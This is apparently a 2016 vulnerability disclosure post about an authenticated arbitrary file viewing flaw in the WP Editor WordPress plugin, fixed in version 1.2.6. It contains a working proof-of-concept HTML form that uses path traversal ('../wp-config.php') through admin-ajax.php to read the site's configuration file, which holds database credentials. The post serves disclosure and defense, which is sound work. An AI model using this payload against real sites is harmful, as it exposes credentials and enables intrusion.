Login
13 May 2016

Authenticated File Viewing Vulnerability in WP Editor

The security vulnerabilities we previously disclosed in WP Editor have now been fixed in version 1.2.6, hopefully those or something else fixed in that version was what hackers are trying to exploit. While looking around for other security issues in plugin we found another vulnerability that had existed in 1.2.5.3 and all version below, which was fixed in 1.2.6 as well.

Similar to the two vulnerabilities the ajax function for requesting a file on the website did not do any check as to the user capabilities when doing that, so any logged in user could view arbitrary files.

Proof of Concept

The following proof of concept will return the contents of the wp-config.php file in the root directory of the WordPress installation, when logged in as a subscriber level or higher user.

Make sure to replace “[path to WordPress]” with the location of WordPress:

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="ajax_folders" />
<input type="hidden" name="dir" value="../wp-config.php" />
<input type="hidden" name="contents" value="1" />
<input type="hidden" name="type" value="plugin" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

No related posts.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published. Required fields are marked *